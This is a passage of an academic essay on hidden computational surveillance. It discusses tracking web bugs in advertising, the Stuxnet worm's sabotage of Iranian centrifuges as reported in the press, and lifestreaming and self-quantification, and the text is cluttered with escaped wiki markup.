&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [Amazon](http://www.businessinsider.com/blackboard/amazon) (e-commerce) is generating $189 per user, at [Google](http://www.businessinsider.com/blackboard/google) (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [AT&amp;amp;amp;T](http://www.att.com/) &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [Right Media](http://www.rightmedia.com/)&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [Burst Media](http://www.burstmedia.com/ )&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types campaigns. Example: [The New York Times](http://www.nytimes.com/)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [BlueKai](http://www.bluekai.com/) &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [Experian](http://www.experian.com/) &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [ROILabs](http://www.roilabs.com/) &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [Safecount](http://www.safecount.net/) &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [Google Analytics](http://www.google.com/analytics/) &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [FetchBack](http://www.fetchback.com/)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [Invite Media](http://www.invitemedia.com/)&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [AdMeld](http://www.admeld.com/)&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [DoubleClick DART](http://www.doubleclick.com/)&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [MediaCom](http://www.mediacom.com/en/home.aspx)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [ClickForensics](http://www.clickforensics.com/) &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [Better Advertising](http://www.betteradvertising.com/)&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma 2010)'' &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform and variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [Turn Media](http://www.turn.com/) is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [BlueKai](http://www.bluekai.com/), [TargusInfo](http://www.targusinfo.com/), [eXelate](http://www.exelate.com/new/index.html), and others (Ghostery 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [readnotify.com](http://readnotify.com/) to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers 2006, Fried 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, certainly is keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately very few companies respect the do not track header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C 2012). Although see the current debate over the EU ePrivacy Directive where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker 2012). &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative direction of travel of these new web bugs under development is called PersianStat ([http://www.persianstat.ir/](http://www.persianstat.com/) ), which claims “an eye on 1091622 websites”, an Iranian web tracking and data analytics website which shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprisingly to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies, Pew (2012) found, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would &amp;quot;not be okay&amp;quot; with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be &amp;quot;okay&amp;quot; with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them (Garber 2012, Pew 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies shows that this is an unstable situation. It also serves to demonstrate the extent by which that users are just not aware of the subterranean depths of their computational devices and the ability for these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This next example is a computer worm called Stuxnet,[6] which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that meet its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. Its name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; and the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki 2011, mmpc2 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first “weaponized” computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry 2010). As Liam O Murchu, an operations manager for Symantec, explained, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller (60minutes 2012b). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBSNews 2010). Later, a ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (AP 2012). The Stuxnet worm is also interesting because it also has built-in ''sunset code'' that causes the worm to erase itself after 24 June 2012, and hence hide its tracks. As Zett (2011) explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is “very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically,”… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz (Zetter 2011). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is interesting because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government, he says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross 2011). Indeed, the complexities and structure of the worm mean that estimates are that at least thirty people would have been working on it simultaneously to build such a worm (Zetter 2010). Especially one that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens – in actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did.’ (Zetter 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60minutes 2012b) and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, (315), was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, (417), manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges (60minutes 2012a). &amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The name Stuxnet origin is hypothesized from an analysis of the approximately 15,000 lines of programming code. This was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to “Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively” (Markoff and Sanger 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60minutes 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins 2011).[10] As Alexander Gostev, reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future (Gostev 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland 2012). This has been usefully described by the Economist, who argue that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying” (Economist 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol (Economist 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman 1997, Gelernter 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A ''lifestream'' is a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries (Freeman 2000). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was certainly one of the first people to collect their data systematically as he explains he started in 1989: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them (Wolfram 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
This way of collecting and sending data has been accelerated by the use of mobile ‘apps’, which are small relatively contained applications that usually perform a single specific function. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied (ActivityStreamsWG 2011, original emphasis).&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry 2011). &lt;br /&gt;
&lt;br /&gt;
